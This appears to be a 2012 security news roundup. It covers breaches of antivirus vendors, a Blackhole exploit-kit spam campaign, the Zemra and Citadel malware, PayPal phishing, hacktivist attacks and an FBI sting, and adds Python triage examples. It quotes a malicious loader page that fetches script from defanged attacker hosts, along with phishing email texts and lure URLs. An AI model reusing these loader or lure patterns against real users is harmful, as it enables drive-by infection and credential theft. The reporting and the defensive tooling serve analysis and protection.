Trendmicro & Sykes Hacked by @OfficialComrade

The website of TrendMicro, one of the popular antivirus vendors, has been hacked by @OfficialComrade (.c0mrade), who dumped a large collection of emails.

The attack also affected Sykes, through which TrendMicro appears to run its support services. It was announced on .c0mrade's Twitter account with the following message.

"Trendmicro & Sykes is a Global Business and Antivirus suite, we've targeted them due to their constant lash of pseudo-security," the hacker said in the Pastebin post.

"Owning Trendmicro & Sykes wasn't a priority of ours. However, if it was, they would have dug their burial site sometime ago."

"Sliding towards more recent events, today is June 30th, 2012 and absurdly, I'm monotonous. Why? Because nowadays, it seems as if everybody is widely concerned with notoriety. New 'groups' are emerging, more 'pigments' are being infiltrated by demented teenagers so they could feel better about themselves, etc. My demands are written on the palm of my hands; stop. You're a nuisance. Sliding back to the whole Trendmicro & Sykes testament, we don't want to be complete pricks, so for the companies' sake, we'll take baby steps on this one. We'll release every inch of their Email Database; Inbox, Drafts, Sent Items, Deleted Items, Attachments, and all content in all folders. You'll need a .dbx file viewer to see the content."

http://pastebin.com/EVSAXjz1

Emails with Subject "ADP Funding Notification – Debit Draft" lead to Exploits

Researchers at MX Lab have intercepted emails with the subject "ADP Funding Notification – Debit Draft" that lead to a malicious web site hosting obfuscated JavaScript code.

The email is sent from the spoofed address "ADP_FSA_Services@ADP.com" or "ADPClientServices@adp.com" and has the following body:


Your Transaction Report(s) have been uploaded to the web site:
https://www.flexdirect.adp.com/client/login.aspx

Please note that your bank account will be debited within one banking business day for the amount(s) shown on the report(s).

Please do not respond or reply to this automated e-mail. If you have any questions or comments, please Contact your ADP Benefits Specialist.

Thank You,
ADP Benefit Services

The URL does not lead to the site mentioned in the text but to hxxp://www.avrakougioumtzi.gr/PQB6j3HW/index.html, where the following HTML code is executed:

<html>
<h1>WAIT PLEASE</h1>
<h3>Loading…</h3>
<script type="text/javascript" src="hxxp://firmowa.malopolska.pl/WVfNMNHn/js.js"></script>
<script type="text/javascript" src="hxxp://humas.poltek-malang.ac.id/w28K6pb6/js.js"></script>
</html>

Both embedded JavaScript files redirect the browser with document.location='hxxp://173.255.228.171/getfile.php?u=853fda24'; the page at that address contains obfuscated JavaScript.

After de-obfuscating the JavaScript, I found a Blackhole exploit pack that tries to exploit one of several vulnerable applications (Flash, PDF readers and others). At the bottom of the page is the applet code that tries to exploit the Java AtomicReference vulnerability.
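The two-stage loader above (a landing page that pulls in remote scripts, each of which rewrites document.location) is a pattern an analyst can triage statically before touching the final payload. The following Python helper is an added example and is not code from the MX Lab report: it parses a constructed landing page whose hostnames are placeholders (not the infrastructure named above), lists every script loaded from a third-party host, and pulls literal redirect targets out of the (already de-obfuscated) script bodies, which are likewise constructed and embedded inline so the snippet runs offline.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample mirroring the loader structure quoted above.
# Hostnames are placeholders, not the real sites from the report.
LANDING_URL = "http://compromised-site.example/PQB6j3HW/index.html"
LANDING_HTML = """<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="http://redirector-one.example/WVfNMNHn/js.js"></script>
<script type="text/javascript" src="http://redirector-two.example/w28K6pb6/js.js"></script>
</html>"""

# Constructed contents of the two included scripts, keyed by URL, as a fetch
# would return them; the redirect target uses a documentation-range IP.
FETCHED_JS = {
    "http://redirector-one.example/WVfNMNHn/js.js":
        "document.location='http://203.0.113.10/getfile.php?u=placeholder';",
    "http://redirector-two.example/w28K6pb6/js.js":
        "document.location='http://203.0.113.10/getfile.php?u=placeholder';",
}


class ScriptSrcCollector(HTMLParser):
    """Collects the src attribute of every <script> tag in the page."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.srcs.append(value)


def external_scripts(html: str, page_url: str) -> list:
    """Return script sources served from a host other than the page's own."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    page_host = urlparse(page_url).hostname
    # Relative sources have no hostname and are treated as same-origin.
    return [s for s in collector.srcs if urlparse(s).hostname not in (None, page_host)]


# Matches literal assignments such as document.location='...' or window.location.href="..."
REDIRECT_RE = re.compile(
    r"""(?:document|window)\.location(?:\.href)?\s*=\s*['"]([^'"]+)['"]"""
)


def redirect_targets(js_source: str) -> list:
    """Extract literal redirect targets from de-obfuscated JavaScript."""
    return REDIRECT_RE.findall(js_source)


def triage(html: str, page_url: str, fetched_js: dict) -> dict:
    """Summarise the chain: landing page -> external scripts -> redirect targets."""
    scripts = external_scripts(html, page_url)
    targets = []
    for src in scripts:
        for target in redirect_targets(fetched_js.get(src, "")):
            if target not in targets:
                targets.append(target)
    return {
        "page": page_url,
        "external_scripts": scripts,
        "redirect_targets": targets,
        "suspicious": bool(scripts) and bool(targets),
    }


if __name__ == "__main__":
    for key, value in triage(LANDING_HTML, LANDING_URL, FETCHED_JS).items():
        print(f"{key}: {value}")
```

The regex only finds plain string literals, so it is meant to run after de-obfuscation, as the report describes; a target built by string concatenation would not be matched and should be resolved by hand or in an instrumented browser.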

Zemra, a new Distributed Denial of Service (DDoS) crimeware bot


A Distributed Denial of Service (DDoS) crimeware bot known as "Zemra" has been identified by Symantec Researchers. This threat has been observed performing denial-of-service attacks against organizations with the purpose of extortion.

Zemra first appeared on underground forums in May 2012 at a cost of €100($125).

This crimeware pack is similar to other crime packs, such as Zeus and SpyEye, in that it has a command-and-control panel hosted on a remote server. This allows it to issue commands to compromised computers and acts as the gateway for recording the number of infections and bots at the attacker's disposal.

Zemra uses 256-bit DES encryption/decryption for communication between server and client, and it can spread via USB devices.

Researchers revealed that the main functionality is the ability to perform a DDoS attack on a remote target computer of the user's choosing.

New version of Citadel Trojan prevents Virtual Machine Analysis


Security researchers from S21sec have spotted two major changes in the latest version of the Citadel Trojan. The two changes, an 'anti-emulator' and an 'encryption change', try to make malware analysts' lives harder.

The anti-emulator: when it starts, a built-in check tests whether it is running in a virtual machine or a sandboxed environment (CWSandbox, VMware, VirtualBox).

If it detects their presence, it starts to behave differently. Details were not disclosed, and the technology is very tricky.

According to the researchers, it simply scans the resources of the currently running processes and looks for specific patterns, for instance inside the "CompanyName" field, such as 'vmware', 'sandbox', 'virtualbox' and 'geswall'.

While running in a VM, the Trojan creates a fake domain name and attempts to connect to it. This strategy is meant to fool researchers into believing that the command and control (C&C) server cannot be reached and that the bot is dead.

This is not the only change brought to Citadel. Experts have found that the RC4 is slightly different compared to previous versions, an internal hash being added to the algorithm.

"Evil" Hacker sentenced to Two-and-a-half Years

The Australian hacker nicknamed “Evil” was sentenced to two-and-a-half years in prison, but could be released on parole in 12 months because he pleaded guilty, according to Police.

25-year-old David Noel Cecil had been arrested almost a year ago for hacking a National Broadband Network-linked service provider, changing and accessing restricted data. He was also accused of cyber-attacking Sydney University's website, several Melbourne businesses, and companies overseas. Overall, Cecil was charged with 50 counts, but refused to be bailed.

Police ran a six-month investigation dubbed “Operation Damara”, and said the 25-year-old unemployed truck driver wanted to prove himself after failing to get into the IT sector.

“This person acted with an extreme and unusual level of malice and with no regard to the damage caused, indiscriminately targeting both individuals and companies,” National Manager Hi Tech Crime Operations Neil Gaughan said.

Feds said further charges will likely follow and others will also be arrested.

‘Confirm PayPal account' notifications lead to phishing sites


Extremely legitimate-looking PayPal-themed emails have been hitting inboxes in the last few days, trying to trick users into entering their account data on the fraudulent web site linked in the emails.

"Dear PayPal Costumer, It has come to our attention that your PayPal account information needs to be updated as part of our continuing commitment to protect your account and to reduce the instance of fraud on our website," The fake email reads.

"If you could please take 5-10 minutes out of your online experience and update your personal records you will not run into any future problems with the online service. However, failure to update your records will result in account suspension. Please update your records before June 12, 2012. Once you have updated your account records, your PayPal account activity will not be interrupted and will continue as normal."

The offered link takes those users to a faithfully reproduced PayPal phishing site.

And while the URL of the site (hxxp://lejesepofol.altervista.org/plaoyap/plaoyap/index.htm) might warn some users about its true nature, there are still too many who won't be bothered with checking it before entering their PayPal login credentials.
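Both this PayPal lure and the ADP lure earlier on the page rely on the same gap: the link's visible text or surrounding wording invokes a trusted brand while the href points at an unrelated domain. The Python snippet below is an added example, not code from either report, showing the two checks a mail gateway or user-awareness tool can apply: a visible URL whose domain differs from the href's, and a brand mentioned in the link while the href's domain is outside that brand's real domains. The sample email fragments and the hostnames in them are constructed placeholders, and the brand-to-domain allowlist is an assumption for the example; the "last two labels" domain extraction is a deliberate simplification that a production version would replace with a public-suffix list.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed allowlist of domains each brand really uses (example values).
BRAND_DOMAINS = {"adp": {"adp.com"}, "paypal": {"paypal.com"}}

# Constructed sample email fragments; hostnames are placeholders.
ADP_STYLE = (
    '<p>Your Transaction Report(s) have been uploaded to the web site: '
    '<a href="http://compromised-site.example/PQB6j3HW/index.html">'
    'https://www.flexdirect.adp.com/client/login.aspx</a></p>'
)
PAYPAL_STYLE = (
    '<p>Dear PayPal Customer, please '
    '<a href="http://lookalike-host.example/plaoyap/plaoyap/index.htm">'
    'update your PayPal records</a> before June 12, 2012.</p>'
)
LEGIT = '<a href="https://www.paypal.com/signin">Log in to PayPal</a>'


class LinkCollector(HTMLParser):
    """Collects (href, visible text) pairs for every <a> element."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def registrable_domain(host):
    """Naive 'last two labels' approximation (no public-suffix list here)."""
    if not host:
        return None
    labels = host.lower().split(".")
    return ".".join(labels[-2:])


def classify_link(href: str, text: str) -> str:
    """Return 'ok' or a short reason the link looks like a lure."""
    href_domain = registrable_domain(urlparse(href).hostname)
    # Check 1: the visible text is itself a URL whose domain differs from the href.
    if text.lower().startswith(("http://", "https://")):
        text_domain = registrable_domain(urlparse(text).hostname)
        if text_domain != href_domain:
            return f"mismatch: text shows {text_domain}, link goes to {href_domain}"
    # Check 2: the link text or URL names a brand, but the href is off-brand.
    haystack = f"{text} {href}".lower()
    for brand, domains in BRAND_DOMAINS.items():
        if re.search(rf"\b{brand}\b", haystack) and href_domain not in domains:
            return f"brand '{brand}' referenced but link goes to {href_domain}"
    return "ok"


def analyse_email(html: str) -> list:
    """Return [(href, verdict), ...] for every link in an HTML email body."""
    collector = LinkCollector()
    collector.feed(html)
    return [(href, classify_link(href, text)) for href, text in collector.links]


if __name__ == "__main__":
    for sample in (ADP_STYLE, PAYPAL_STYLE, LEGIT):
        for href, verdict in analyse_email(sample):
            print(f"{verdict:60s} {href}")
```

Check 1 catches the ADP-style message on its own, without any brand knowledge; check 2 is what flags the PayPal-style message, and it is also the one that needs tuning, since legitimate mail from a brand often links to third-party tracking or unsubscribe hosts.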

Panda Security site Hacked and database compromised by @LulzSecMx


A hacker known as @LulzSecMx claimed to have gained unauthorized access to the website of 'Panda Security', one of the biggest anti-virus providers, and leaked its database on Pastebin. The attack was announced via @LulzSecMx.

"pandasecurity.com, best known for its antivirus shit we have a message for you: D" the hacker said.

"We entered through the back door, they have earned money by working with police to be on the lookout and inform activists, your page as your antivirus is bullshit!"

The leak contains email addresses, encrypted passwords and other confidential data taken from the PandaSecurity.com website.

Anonymous Hackers attacked Japanese Govt. sites in Protest of Anti-Piracy Laws


The international hackers collective Anonymous has launched a series of cyber-attacks against Japanese government websites in protest at new stiffer penalties for illegal downloading that were passed in a copyright law amendment last week.

According to The Japan Times, the law was approved by the Education, Culture and Science Committee of the House of Councilors with 221 votes in favor.

After October 1, when the law goes into effect, users who download copyrighted content or copy DVDs may receive a fine of up to ¥2 million ($250,000 or 200,000 EUR) and can even be sentenced to a maximum of two years in prison.

Many fear that the way the bill is worded leaves a lot of room for interpretation, which could lead to a lot of unfair prosecutions.

In response to the news, Anonymous has released a statement that announces the start of an operation against the Japanese government.

“Earlier this week Japan approved an amendment to its copyright law which will give authorities the right to imprison citizens for up to two years simply for downloading copyrighted material,” Anonymous wrote.

“We at Anonymous believe strongly that this will result in scores of unnecessary prison sentences to numerous innocent citizens while doing little to solve the underlying problem of legitimate copyright infringement,” the hacktivists added.

“If this situation alone wasn’t horrible enough already, the content industry is now pushing ISPs in Japan to implement surveillance technology that will spy on and every single internet user in Japan. This would be an unprecedented approach and severely reduce the amount of privacy law abiding citizens should have in a free society.”

They concluded by launching a threat against the government and organizations that represent rights holders.

“To the government of Japan and the Recording Industry Association of Japan, you can now expect us the same way we have come to expect you in violating our basic rights to privacy and to an open internet.”

After the operation was announced, the finance ministry's website was hacked, with messages opposing the stricter copyright laws posted on a number of its pages. The sites of the Supreme Court of Japan and the Intellectual Property High Court were also reported down overnight, while access to the sites of the two main political parties was said to be restricted.

Hook Analyser 2.0 released: a tool for reversing applications and analysing malware

Hook Analyser is a hooking tool that can help with reversing applications and analysing malware.

Changelog:

  • Static analysis functionality has got improved significantly.
  • Nice fingerprinting feature (part of the static analysis module).
  • Analysis and logging modules have improved.
  • No more annoying browser pop-ups (previous releases had some).

Download it from here:
http://beenuarora.com/HookAnalyser2.0.zip

Blackhole Exploit Kit upgraded to generate pseudo-random domains

Blackhole Exploit Kit is one of the best-known exploit kits used by cyber criminals to infect users through drive-by downloads. It delivers a range of exploits targeting Java, Adobe Flash Player, Adobe Reader, Windows Help Center and other applications.

Although this approach has generally been very successful for malware authors, it has had one weakness. If the location or URL for the iframe, which actually contains the malicious code, changes or is taken down, all of the compromised sites will have to be updated to point to this new location. This process is difficult and impractical.

To deal with this, the Blackhole JavaScript code on compromised sites now dynamically generates pseudo-random domains, based on the date and other information, and then creates an iframe pointing to the generated domain.

After de-obfuscating the JavaScript in the compromised pages, Symantec researchers found the code that generates the pseudo-random domains.

This code uses the setTimeout() DOM function to run a particular piece of code (the anonymous function at the bottom of the code) after half a second. This function calls the following:

  • generatePseudoRandomString() function, with a timestamp
  • 16, the desired length of the domain name
  • ru, the top-level domain name to use

The code then creates a hidden iframe, using the previously-generated domain as the source.

Once the domain has been generated and the iframe has been created, the exploit kit page runs many exploits as normal, going to great lengths to determine, for example, which compromised PDF file to show, depending on the version of Adobe Reader installed.

Running this code in isolation, it seems that the pseudo-random domain is based on a number which is in turn based on an initial seed value, the current month and the day of the current month. When running the code at the time of writing, it returned:

lfbovcaitd[REMOVED].ru

By changing the date passed to the function we can determine the domains that will be used in future. All domains up to 7 August of this year have already been registered and all currently resolve to the same IP address. The domains, all recently registered, use private registration, so the registrant's details are not published in WHOIS.
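The defensive value of a date-seeded generator is exactly what the last paragraph describes: once the function is recovered, a defender can run it forward and block or sinkhole the domains before the kit rotates to them. The following Python is an added example, not Symantec's code or the kit's own generator; the real seed and mixing function are not on the page, so a hypothetical seed constant and a SHA-256 based mixer stand in for them. It keeps the properties the text does state (16-character label, .ru TLD, output depending on a seed plus the month and day, with the year ignored) and shows how the output feeds a blocklist and a DNS-log check; the start date is a constructed example value.

```python
import hashlib
from datetime import date, timedelta

# Assumptions for this example: the kit's actual seed and mixing function are not
# published on the page, so a hypothetical seed and SHA-256 stand in for them.
SEED = 0x5EED            # hypothetical seed constant
DOMAIN_LENGTH = 16       # label length quoted on the page
TLD = "ru"               # top-level domain quoted on the page


def generate_pseudo_random_string(seed: int, when: date, length: int = DOMAIN_LENGTH) -> str:
    """Map (seed, month, day) to a lowercase label. The year is deliberately
    left out to mirror the behaviour described above: the same month and day
    in any year yield the same label."""
    material = f"{seed}:{when.month}:{when.day}".encode()
    digest = hashlib.sha256(material).digest()
    return "".join(chr(ord("a") + byte % 26) for byte in digest[:length])


def domain_for(when: date, seed: int = SEED) -> str:
    """Full domain the generator would emit on a given date."""
    return f"{generate_pseudo_random_string(seed, when)}.{TLD}"


def predict_domains(start: date, days: int, seed: int = SEED) -> list:
    """Enumerate the domains for the next `days` days starting at `start`,
    which is the list a defender would pre-register, sinkhole or block."""
    return [domain_for(start + timedelta(days=i), seed) for i in range(days)]


def is_predicted(hostname: str, start: date, days: int, seed: int = SEED) -> bool:
    """Check an observed hostname (for example from DNS logs) against the
    predicted set; normalises case and a trailing dot."""
    return hostname.lower().rstrip(".") in set(predict_domains(start, days, seed))


if __name__ == "__main__":
    start = date(2012, 7, 1)   # constructed example start date
    for d in predict_domains(start, 7):
        print(d)
```

Because the year is not part of the input, the predicted list repeats every year for a fixed seed; a blocklist built this way therefore stays valid until the kit's seed changes, which is also the signal to re-derive it.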

FBI two-year cybercrime sting leads to 24 arrests


The FBI orchestrated a two-year cybercrime sting that resulted in 24 arrests, with some alleged hackers facing more than 20 years in prison for allegedly profiting from stolen information such as credit card and bank account numbers, law enforcement authorities announced today.

The U.S attorney's office in Manhattan and the FBI announced the arrests and provided details of the sting operation, which involved FBI agents posing as hackers while the bureau set up a fake "carding" forum, according to the press release (see the full release below).

Carding is the term for crimes associated with exploiting stolen personal information for profit. The forums helped "carders" communicate and, in some cases, find mailing addresses -- usually empty apartments or houses -- for products purchased with stolen credit-card data.

While the sting netted 24 arrests across eight countries, authorities only shared the charges of 12 alleged hackers. These individuals were charged with several counts of fraud, including selling personal data, using stolen information to purchase or obtain products, and selling tools to aid hackers in stealing information.

The FBI claims it prevented 400,000 potential cybercrimes via this operation.

via cnet